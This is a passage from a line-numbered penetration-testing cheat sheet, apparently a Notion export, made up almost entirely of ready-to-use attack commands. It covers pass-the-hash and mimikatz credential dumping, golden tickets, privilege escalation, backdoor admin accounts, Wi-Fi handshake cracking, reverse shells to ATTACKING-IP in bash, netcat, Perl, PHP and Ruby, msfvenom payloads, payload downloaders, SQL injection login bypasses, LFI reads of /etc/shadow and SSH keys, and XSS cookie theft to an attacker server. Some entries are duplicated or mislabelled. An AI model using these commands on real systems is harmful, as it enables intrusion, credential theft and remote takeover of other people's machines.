#Pass the hash network-wide, local login, dump LSA contents 1127 | crackmapexec smb 10.0.0.1/24 -u administrator -H <hash> --local-auth --lsa 1128 | 1129 | ``` 1130 | 1131 | - [secretsdump.py](http://secretsdump.py) (impacket) - dumps hashes for known user/password 1132 | 1133 | ```powershell 1134 | secretsdump.py marvel/fcastle:Pssword1@192.168.4.4 1135 | ``` 1136 | 1137 | - [incognito (meterpeter)](https://www.notion.so/incognito-meterpeter-881379ef297d4b3f8b50745428e1e8ed) - can impersonate a user 1138 | - [GetUserSPNs.py](http://getuserspns.py) (impacket) 1139 | 1140 | ```bash 1141 | GetUserSpns.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request 1142 | ``` 1143 | 1144 | - [mimikatz](https://github.com/gentilkiwi/mimikatz) - can extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets 1145 | 1146 | ```bash 1147 | mimikatz 1148 | privilege::debug` (allow us to bypass several protections) 1149 | sekurlsa::logonpasswords` show us all users login from reboot, we can pass the hash or crack them, we can search for `wdigest` until windows8 including windows7 the passoword stored in plain text, from windows8 microsoft turned it off, we can turn it on from mimikatz and wait for a user to login 1150 | lsadump::sam` dumps the SAM 1151 | lsadump::lsa /patch` dumps Local Security Authority 1152 | lsadump::lsa /inject /name:krbtgt` 1153 | kerberos::golden /User:Administrator(doesnt matter, can be fake) /domain:marvel.local /sid:SID /krbtgt:NTLM /id:500(your RID) /ptt(pass the ticket to our next session)` 1154 | misc::command` (gives us command prompt with full privilege) 1155 | ``` 1156 | 1157 | # Privilige Escalation ([alot of resources](https://github.com/coreb1t/awesome-pentest-cheat-sheets#privilege-escalation)) 1158 | 1159 | [Linux privilege escalation](https://jok3rsecurity.wordpress.com/linux-privilege-escalation/) 1160 | 1161 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 1162 | 1163 | [windows privilege escalation](https://jok3rsecurity.wordpress.com/windows-privilege-escalation/) 1164 | 1165 | [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 1166 | 1167 | [C0nd4/OSCP-Priv-Esc](https://github.com/C0nd4/OSCP-Priv-Esc) 1168 | 1169 | ## **Linux:** 1170 | 1171 | Find Binaries that will execute as the owner 1172 | 1173 | ```bash 1174 | find / -perm -u=s -type f 2>/dev/null 1175 | ``` 1176 | 1177 | Find binaries that will execute as the group 1178 | 1179 | ```bash 1180 | find / -perm -g=s -type f 2>/dev/null 1181 | ``` 1182 | 1183 | Find sticky-bit binaries 1184 | 1185 | ```bash 1186 | find / -perm -1000 -type d 2>/dev/null 1187 | ``` 1188 | 1189 | If Python is executable as root 1190 | 1191 | ```bash 1192 | python2.7 -c "import pty;pty.spawn('/bin/sh');" 1193 | ``` 1194 | 1195 | - [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux Privilege Escalation Awesome Script 1196 | 1197 | ```bash 1198 | #From github 1199 | curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh 1200 | 1201 | #Local network 1202 | sudo python -m SimpleHTTPServer 80 1203 | curl 10.10.10.10/linpeas.sh | sh 1204 | 1205 | #Without curl 1206 | sudo nc -q 5 -lvnp 80 < linpeas.sh 1207 | cat < /dev/tcp/10.10.10.10/80 | sh 1208 | 1209 | #Output to file 1210 | linpeas -a > /dev/shm/linpeas.txt 1211 | less -r /dev/shm/linpeas.txt #Read with colors 1212 | ``` 1213 | 1214 | - [LinEnum](https://github.com/rebootuser/LinEnum) 1215 | 1216 | ```bash 1217 | ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t 1218 | #-k Enter keyword 1219 | #-e Enter export location 1220 | #-t Include thorough (lengthy) tests 1221 | #-s Supply current user password to check sudo perms (INSECURE) 1222 | #-r Enter report name 1223 | #-h Displays this help text 1224 | ``` 1225 | 1226 | [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 1227 | 1228 | [https://github.com/pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) 1229 | 1230 | ## **Windows:** 1231 | 1232 | ```powershell 1233 | #after getting a low privilege shell 1234 | systeminfo 1235 | #copy the result to systeminfo.txt 1236 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --update 1237 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DB].xls 1238 | ``` 1239 | 1240 | [https://github.com/pentestmonkey/windows-prive](https://github.com/pentestmonkey/windows-privesc-check) 1241 | 1242 | [sc-check](https://github.com/pentestmonkey/windows-privesc-check) 1243 | 1244 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) 1245 | 1246 | [https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) 1247 | 1248 | # Maintain Access 1249 | 1250 | - metasploit 1251 | 1252 | ```bash 1253 | persistence -h 1254 | OR 1255 | exploit/windows/local/persistence 1256 | OR 1257 | net user hacker password123 /add 1258 | ``` 1259 | 1260 | # Wireless Penetration 1261 | 1262 | - airmon-ng, airodump-ng, aircrack-ng - crack wifi networks 1263 | 1264 | ```bash 1265 | iwconfig #show wireless cards, check after connecting the wireless card to the vm machine in options 1266 | airmon-ng check kill #will kill process that intruppt 1267 | airmon-ng start wlan0 #starts monitor mode on the card 1268 | iwconfig #will assure that we are in monitor mode 1269 | airodump-ng wlan0mon #check for avaliable networks, PWR show the closer network, the smallest number is the closest 1270 | airodump-ng -c 6 --bssid MAC -w capture wlan0mon #will capture data from the specific MAC address of the network we want, 6 is the channel number of the network 1271 | 1272 | #we are waiting to capture the handshake, it will written in the header 1273 | #we can make it faster by DEAUTH which means kicking a connected user and while he re-auth we will capture the handshake 1274 | #in a new terminal: 1275 | aireplay-ng -0 1 -a MAC_OF_THE_NETWORK -c MAC_OF_THE_STATION_CONNECTED wlan0mon 1276 | ls capture* 1277 | aircrack-ng -w wordlist.txt -b MAC_OF_THE_NETWORK CAPTUREFILE #could be done also with hashcat 1278 | #phone numbers are very common as a password 1279 | 1280 | ``` 1281 | 1282 | # **Shells & Reverse Shells** 1283 | 1284 | ## **SUID C Shells** 1285 | 1286 | - bin/bash: 1287 | 1288 | ``` 1289 | int main(void){ 1290 | 1291 | setresuid(0, 0, 0); 1292 | 1293 | system("/bin/bash"); 1294 | 1295 | } 1296 | ``` 1297 | 1298 | - bin/sh: 1299 | 1300 | ``` 1301 | int main(void){ 1302 | 1303 | setresuid(0, 0, 0); 1304 | 1305 | system("/bin/sh"); 1306 | 1307 | } 1308 | ``` 1309 | 1310 | ### **TTY Shell:** 1311 | 1312 | ```bash 1313 | python -c 'import pty;pty.spawn("/bin/bash")' #Python TTY Shell Trick 1314 | ``` 1315 | 1316 | ```bash 1317 | echo os.system('/bin/bash') 1318 | ``` 1319 | 1320 | ```bash 1321 | /bin/sh –i #Spawn Interactive sh shell 1322 | ``` 1323 | 1324 | ```bash 1325 | execute('/bin/sh') 1326 | ``` 1327 | 1328 | - LUA 1329 | 1330 | ```bash 1331 | !sh 1332 | ``` 1333 | 1334 | - Privilege Escalation via nmap 1335 | 1336 | ```bash 1337 | :!bash 1338 | ``` 1339 | 1340 | - Privilege escalation via vi 1341 | 1342 | ### Fully Interactive TTY 1343 | 1344 | ``` 1345 | In reverse shell 1346 | python -c 'import pty; pty.spawn("/bin/bash")' 1347 | Ctrl-Z 1348 | In Attacker console 1349 | stty -a 1350 | stty raw -echo 1351 | fg 1352 | In reverse shell 1353 | reset 1354 | export SHELL=bash 1355 | export TERM=xterm-256color 1356 | stty rows <num> columns <cols> 1357 | ``` 1358 | 1359 | ### **Spawn Ruby Shell** 1360 | 1361 | ```bash 1362 | exec "/bin/sh" 1363 | ``` 1364 | 1365 | ```bash 1366 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 1367 | ``` 1368 | 1369 | ### **Netcat** 1370 | 1371 | ```bash 1372 | nc -e /bin/sh ATTACKING-IP 80 1373 | ``` 1374 | 1375 | ```bash 1376 | /bin/sh | nc ATTACKING-IP 80 1377 | ``` 1378 | 1379 | ```bash 1380 | rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p 1381 | ``` 1382 | 1383 | ### **Telnet Reverse Shell** 1384 | 1385 | ```bash 1386 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p 1387 | ``` 1388 | 1389 | ```bash 1390 | telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 1391 | ``` 1392 | 1393 | ### **PHP** 1394 | 1395 | ```bash 1396 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' 1397 | ``` 1398 | 1399 | - (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6) 1400 | 1401 | ### **Bash** 1402 | 1403 | ```bash 1404 | exec /bin/bash 0&0 2>&0 1405 | ``` 1406 | 1407 | ```bash 1408 | 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196 1409 | ``` 1410 | 1411 | ```bash 1412 | exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done 1413 | ``` 1414 | 1415 | ```bash 1416 | # or: while read line 0<&5; do $line 2>&5 >&5; done 1417 | ``` 1418 | 1419 | ```bash 1420 | bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 1421 | ``` 1422 | 1423 | ### **Perl** 1424 | 1425 | ```bash 1426 | exec "/bin/sh"; 1427 | ``` 1428 | 1429 | ```bash 1430 | perl —e 'exec "/bin/sh";' 1431 | ``` 1432 | 1433 | ```bash 1434 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1435 | ``` 1436 | 1437 | ```bash 1438 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 1439 | ``` 1440 | 1441 | - Windows 1442 | 1443 | ```bash 1444 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1445 | ``` 1446 | 1447 | - 1448 | 1449 | # Meterpreter (Metasploit) ([cheet sheet](https://www.tunnelsup.com/metasploit-cheat-sheet/)) 1450 | 1451 | ### **Windows reverse meterpreter payload** 1452 | 1453 | ```bash 1454 | set payload windows/meterpreter/reverse_tcp 1455 | ``` 1456 | 1457 | - Windows reverse tcp payload 1458 | 1459 | ### **Windows VNC Meterpreter payload** 1460 | 1461 | ```bash 1462 | set payload windows/vncinject/reverse_tcpf 1463 | ``` 1464 | 1465 | - Meterpreter Windows VNC Payload 1466 | 1467 | ```bash 1468 | set ViewOnly false 1469 | ``` 1470 | 1471 | ### **Linux Reverse Meterpreter payload** 1472 | 1473 | ```bash 1474 | set payload linux/meterpreter/reverse_tcp 1475 | ``` 1476 | 1477 | - Meterpreter Linux Reverse Payload 1478 | 1479 | ### **Meterpreter Cheat Sheet** 1480 | 1481 | ```bash 1482 | upload file c:\\windows 1483 | ``` 1484 | 1485 | - Meterpreter upload file to Windows target 1486 | 1487 | ```bash 1488 | download c:\\windows\\repair\\sam /tmp 1489 | ``` 1490 | 1491 | - Meterpreter download file from Windows target 1492 | 1493 | ```bash 1494 | download c:\\windows\\repair\\sam /tmp 1495 | ``` 1496 | 1497 | - Meterpreter download file from Windows target 1498 | 1499 | ```bash 1500 | execute -f c:\\windows\temp\exploit.exe 1501 | ``` 1502 | 1503 | - Meterpreter run .exe on target – handy for executing uploaded exploits 1504 | 1505 | ```bash 1506 | execute -f cmd -c 1507 | ``` 1508 | 1509 | - Creates new channel with cmd shell 1510 | 1511 | ```bash 1512 | ps 1513 | ``` 1514 | 1515 | - Meterpreter show processes 1516 | 1517 | ```bash 1518 | shell 1519 | ``` 1520 | 1521 | - Meterpreter get shell on the target 1522 | 1523 | ```bash 1524 | getsystem 1525 | ``` 1526 | 1527 | - Meterpreter attempts priviledge escalation the target 1528 | 1529 | ```bash 1530 | hashdump 1531 | ``` 1532 | 1533 | - Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first) 1534 | 1535 | ```bash 1536 | portfwd add –l 3389 –p 3389 –r target 1537 | ``` 1538 | 1539 | - Meterpreter create port forward to target machine 1540 | 1541 | ```bash 1542 | portfwd delete –l 3389 –p 3389 –r target 1543 | ``` 1544 | 1545 | - Meterpreter delete port forward 1546 | 1547 | ```bash 1548 | use exploit/windows/local/bypassuac 1549 | ``` 1550 | 1551 | - Bypass UAC on Windows 7 + Set target + arch, x86/64 1552 | 1553 | ```bash 1554 | use auxiliary/scanner/http/dir_scanner 1555 | ``` 1556 | 1557 | - Metasploit HTTP directory scanner 1558 | 1559 | ```bash 1560 | use auxiliary/scanner/http/jboss_vulnscan 1561 | ``` 1562 | 1563 | - Metasploit JBOSS vulnerability scanner 1564 | 1565 | ```bash 1566 | use auxiliary/scanner/mssql/mssql_login 1567 | ``` 1568 | 1569 | - Metasploit MSSQL Credential Scanner 1570 | 1571 | ```bash 1572 | use auxiliary/scanner/mysql/mysql_version 1573 | ``` 1574 | 1575 | - Metasploit MSSQL Version Scanner 1576 | 1577 | ```bash 1578 | use auxiliary/scanner/oracle/oracle_login 1579 | ``` 1580 | 1581 | - Metasploit Oracle Login Module 1582 | 1583 | ```bash 1584 | use exploit/multi/script/web_delivery 1585 | ``` 1586 | 1587 | - Metasploit powershell payload delivery module 1588 | 1589 | ```bash 1590 | post/windows/manage/powershell/exec_powershell 1591 | ``` 1592 | 1593 | - Metasploit upload and run powershell script through a session 1594 | 1595 | ```bash 1596 | use exploit/multi/http/jboss_maindeployer 1597 | ``` 1598 | 1599 | - Metasploit JBOSS deploy 1600 | 1601 | ```bash 1602 | use exploit/windows/mssql/mssql_payload 1603 | ``` 1604 | 1605 | - Metasploit MSSQL payload 1606 | 1607 | ```bash 1608 | run post/windows/gather/win_privs 1609 | ``` 1610 | 1611 | - Metasploit show privileges of current user 1612 | 1613 | ```bash 1614 | use post/windows/gather/credentials/gpp 1615 | ``` 1616 | 1617 | - Metasploit grab GPP saved passwords 1618 | 1619 | ```bash 1620 | load kiwi 1621 | ``` 1622 | 1623 | ```bash 1624 | creds_all 1625 | ``` 1626 | 1627 | - Metasploit load Mimikatz/kiwi and get creds 1628 | 1629 | ```bash 1630 | run post/windows/gather/local_admin_search_enum 1631 | ``` 1632 | 1633 | - Idenitfy other machines that the supplied domain user has administrative access to 1634 | 1635 | ```bash 1636 | set AUTORUNSCRIPT post/windows/manage/migrate 1637 | ``` 1638 | 1639 | ### **Meterpreter Payloads** 1640 | 1641 | ```bash 1642 | msfvenom –l 1643 | ``` 1644 | 1645 | - List options 1646 | 1647 | ### **Binaries** 1648 | 1649 | ```bash 1650 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 1651 | ``` 1652 | 1653 | ```bash 1654 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 1655 | ``` 1656 | 1657 | ```bash 1658 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 1659 | ``` 1660 | 1661 | ### **Web Payloads** 1662 | 1663 | ```bash 1664 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 1665 | ``` 1666 | 1667 | - PHP 1668 | 1669 | ```bash 1670 | set payload php/meterpreter/reverse_tcp 1671 | ``` 1672 | 1673 | - Listener 1674 | 1675 | ```bash 1676 | cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php 1677 | ``` 1678 | 1679 | - PHP 1680 | 1681 | ```bash 1682 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 1683 | ``` 1684 | 1685 | - ASP 1686 | 1687 | ```bash 1688 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 1689 | ``` 1690 | 1691 | - JSP 1692 | 1693 | ```bash 1694 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 1695 | ``` 1696 | 1697 | - WAR 1698 | 1699 | ### **Scripting Payloads** 1700 | 1701 | ```bash 1702 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 1703 | ``` 1704 | 1705 | - Python 1706 | 1707 | ```bash 1708 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 1709 | ``` 1710 | 1711 | - Bash 1712 | 1713 | ```bash 1714 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 1715 | ``` 1716 | 1717 | - Perl 1718 | 1719 | ### **Shellcode** 1720 | 1721 | For all shellcode see ‘msfvenom –help-formats’ for information as to 1722 | valid parameters. Msfvenom will output code that is able to be cut and 1723 | pasted in this language for your exploits. 1724 | 1725 | ```bash 1726 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 1727 | ``` 1728 | 1729 | ```bash 1730 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 1731 | ``` 1732 | 1733 | ```bash 1734 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 1735 | ``` 1736 | 1737 | ### **Handlers** 1738 | 1739 | Metasploit handlers can be great at quickly setting up Metasploit to 1740 | be in a position to receive your incoming shells. Handlers should be in 1741 | the following format. 1742 | 1743 | ``` 1744 | exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z 1745 | ``` 1746 | 1747 | An example is: 1748 | 1749 | ``` 1750 | msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension 1751 | ``` 1752 | 1753 | # **Powershell** 1754 | 1755 | **Execution Bypass** 1756 | 1757 | ```bash 1758 | Set-ExecutionPolicy Unrestricted 1759 | ./file.ps1 1760 | ``` 1761 | 1762 | ```bash 1763 | Import-Module script.psm1 1764 | Invoke-FunctionThatIsIntheModule 1765 | ``` 1766 | 1767 | ```bash 1768 | iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”) 1769 | ``` 1770 | 1771 | **Powershell.exe blocked** 1772 | 1773 | ```bash 1774 | Use ‘not powershell’ [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps) 1775 | ``` 1776 | 1777 | **Persistence** 1778 | 1779 | ```bash 1780 | net user username "password" /ADD 1781 | ``` 1782 | 1783 | ```bash 1784 | net group "Domain Admins" %username% /DOMAIN /ADD 1785 | ``` 1786 | 1787 | **Gather NTDS.dit file** 1788 | 1789 | ```bash 1790 | ntdsutil 1791 | ``` 1792 | 1793 | ```bash 1794 | activate instance ntds 1795 | ``` 1796 | 1797 | ```bash 1798 | ifm 1799 | ``` 1800 | 1801 | ```bash 1802 | create full C:\ntdsutil 1803 | ``` 1804 | 1805 | ```bash 1806 | quit 1807 | ``` 1808 | 1809 | ```bash 1810 | quit 1811 | ``` 1812 | 1813 | # **SQLInjections** 1814 | 1815 | ### Common **Injections for Login Forms:** 1816 | 1817 | ```bash 1818 | admin' -- 1819 | ``` 1820 | 1821 | ```bash 1822 | admin' # 1823 | ``` 1824 | 1825 | ```bash 1826 | admin'/* 1827 | ``` 1828 | 1829 | ```bash 1830 | ' or 1=1-- 1831 | ``` 1832 | 1833 | ```bash 1834 | ' or 1=1# 1835 | ``` 1836 | 1837 | ```bash 1838 | ' or 1=1/* 1839 | ``` 1840 | 1841 | ```bash 1842 | ') or '1'='1-- 1843 | ``` 1844 | 1845 | ```bash 1846 | ') or ('1'='1— 1847 | ``` 1848 | 1849 | ## Uploading Files to Target Machine 1850 | 1851 | TFTP 1852 | 1853 | ```bash 1854 | #TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp 1855 | service atftpd start 1856 | 1857 | # Windows 1858 | tftp -i $ATTACKER get /download/location/file /save/location/file 1859 | ``` 1860 | 1861 | FTP 1862 | 1863 | ```bash 1864 | # Linux: set up ftp server with anonymous logon access; 1865 | twistd -n ftp -p 21 -r /file/to/serve 1866 | 1867 | # Windows shell: read FTP commands from ftp-commands.txt non-interactively; 1868 | echo open $ATTACKER>ftp-commands.txt 1869 | echo anonymous>>ftp-commands.txt 1870 | echo whatever>>ftp-commands.txt 1871 | echo binary>>ftp-commands.txt 1872 | echo get file.exe>>ftp-commands.txt 1873 | echo bye>>ftp-commands.txt 1874 | ftp -s:ftp-commands.txt 1875 | 1876 | # Or just a one-liner 1877 | (echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd 1878 | ``` 1879 | 1880 | CertUtil (download file from windows) 1881 | 1882 | ```bash 1883 | certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe 1884 | me 1885 | ``` 1886 | 1887 | PHP 1888 | 1889 | ```bash 1890 | <?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?> 1891 | ``` 1892 | 1893 | Python 1894 | 1895 | ```bash 1896 | python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1897 | ``` 1898 | 1899 | HTTP: Powershell 1900 | 1901 | ```bash 1902 | python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1903 | ``` 1904 | 1905 | HTTP: Linux 1906 | 1907 | ```bash 1908 | wget http://$ATTACKER/file 1909 | curl http://$ATTACKER/file -O 1910 | scp ~/file/file.bin user@$TARGET:tmp/backdoor.py 1911 | ``` 1912 | 1913 | NetCat 1914 | 1915 | ```bash 1916 | # Attacker 1917 | nc -l -p 4444 < /tool/file.exe 1918 | 1919 | # Victim 1920 | nc $ATTACKER 4444 > file.exe 1921 | ``` 1922 | 1923 | # Web Application 1924 | 1925 | ## LFI (Local File Inclusion) 1926 | 1927 | if we found an LFI, we can check each of those paths, 1928 | 1929 | we can use burpsuite intruder to see all 1930 | Useful LFI files 1931 | Linux 1932 | /etc/passwd 1933 | /etc/shadow 1934 | /etc/issue 1935 | /etc/group 1936 | /etc/hostname 1937 | /etc/ssh/ssh_config 1938 | /etc/ssh/sshd_config 1939 | /root/.ssh/id_rsa 1940 | /root/.ssh/authorized_keys 1941 | /home/user/.ssh/authorized_keys 1942 | /home/user/.ssh/id_rsa 1943 | /proc/[0-9]*/fd/[0-9]* 1944 | /proc/mounts 1945 | /home/$USER/.bash_history 1946 | /home/$USER/.ssh/id_rsa 1947 | /var/run/secrets/kubernetes.io/serviceaccount 1948 | /var/lib/mlocate/mlocate.db 1949 | /var/lib/mlocate.db 1950 | Apache 1951 | /etc/apache2/apache2.conf 1952 | /usr/local/etc/apache2/httpd.conf 1953 | /etc/httpd/conf/httpd.conf 1954 | Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log 1955 | Debian/Ubuntu -> /var/log/apache2/access.log 1956 | FreeBSD -> /var/log/httpd-access.log 1957 | /var/log/apache/access.log 1958 | /var/log/apache/error.log 1959 | /var/log/apache2/access.log 1960 | /var/log/apache/error.log 1961 | MySQL 1962 | /var/lib/mysql/mysql/user.frm 1963 | /var/lib/mysql/mysql/user.MYD 1964 | /var/lib/mysql/mysql/user.MYI 1965 | Windows 1966 | /boot.ini 1967 | /autoexec.bat 1968 | /windows/system32/drivers/etc/hosts 1969 | /windows/repair/SAM 1970 | /windows/panther/unattended.xml 1971 | /windows/panther/unattend/unattended.xml 1972 | /windows/system32/license.rtf 1973 | /windows/system32/eula.txt 1974 | 1975 | Situation 1976 | 1977 | ``` 1978 | http://<target>/index.php?parameter=value 1979 | 1980 | ``` 1981 | 1982 | ### How to Test 1983 | 1984 | ``` 1985 | http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index 1986 | 1987 | ``` 1988 | 1989 | ``` 1990 | http://<target>/script.php?page=../../../../../../../../etc/passwd 1991 | OR 1992 | http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd 1993 | OR 1994 | curl http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd 1995 | 1996 | ``` 1997 | 1998 | ``` 1999 | http://<target>/script.php?page=../../../../../../../../boot.ini 2000 | 2001 | ``` 2002 | 2003 | ### LFI Payloads 2004 | 2005 | - [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders) 2006 | - [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) 2007 | 2008 | ## XSS 2009 | 2010 | ### Reflected 2011 | 2012 | ### Simple test 2013 | 2014 | This is a simple test to see what happens, this is not a prove that the field is vuln to xss 2015 | 2016 | <plaintext> 2017 | 2018 | ### Simple XSS test 2019 | 2020 | <script>alert('Found')</script> 2021 | 2022 | "><script>alert(Found)</script>"> 2023 | 2024 | <script>alert(String.fromCharCode(88,83,83))</script> 2025 | 2026 | ### Bypass filter of tag script 2027 | 2028 | `" onload="alert(String.fromCharCode(88,83,83))` 2029 | 2030 | " onload="alert('XSS') 2031 | 2032 | bla is not a valid image, so this cause an error 2033 | 2034 | <img src='bla' onerror=alert("XSS")> 2035 | 2036 | ### Persistent 2037 | 2038 | >document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>"; 2039 | 2040 | ### PHP collector 2041 | 2042 | `> cookie.txtchmod 777 cookie.txt` 2043 | 2044 | edit a php page like colector.php as follow: 2045 | 2046 | <?php $cookie=GET['cookie']; $useragent=$_SERVER['HTTP_USER_AGENT']; $file=fopen('cookie.txt', 'a'); fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); fclose($file); 2047 | ?> 2048 | 2049 | Script to put in page: 2050 | 2051 | <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script> 2052 | 2053 | ### Malware Donwloader via XSS 2054 | 2055 | <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> 2056 | 2057 | ### How to play Mario with XSS 2058 | 2059 | <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> 2060 | 2061 | <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus> 2062 | 2063 | ### XSS payloads 2064 | 2065 | - [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) 2066 | - [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS) 2067 | 2068 | ## MySql Cheat Sheet 2069 | 2070 | ```bash 2071 | mysql -u [username] -p; #connect, you will be asked for password 2072 | SHOW DATABASES; 2073 | use DB_NAME; 2074 | SHOW TABLES; 2075 | select * from TABLE; 2076 | ``` 2077 | 2078 | [MySQL cheatsheet](https://devhints.io/mysql) 2079 | 2080 | [MySQL Cheat Sheet](https://www.mysqltutorial.org/mysql-cheat-sheet.aspx) 2081 | 2082 | # Misc 2083 | 2084 | ## Linux file permissions 2085 | 2086 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png) 2087 | 2088 | ## Linux Cheat Sheet 2089 | 2090 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png) 2091 | 2092 | [](https://itblogr.com/wp-content/uploads/2020/04/The-Concise-Blue-Team-cheat-Sheets.pdf?fbclid=IwAR2lG6uxX3cMwu4G80Vwl_ZxpddwEPDqsyXb27yw5xjMOnAB1zX9ZEjDl78) 2093 | 2094 | [Hacking Cheat Sheets](https://cheatography.com/tag/hacking/) 2095 | 2096 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png) 2097 | 2098 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png) 2099 | 2100 | vi cheat sheet 2101 | 2102 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png) 2103 | 2104 | ## find cheat sheet 2105 | 2106 | 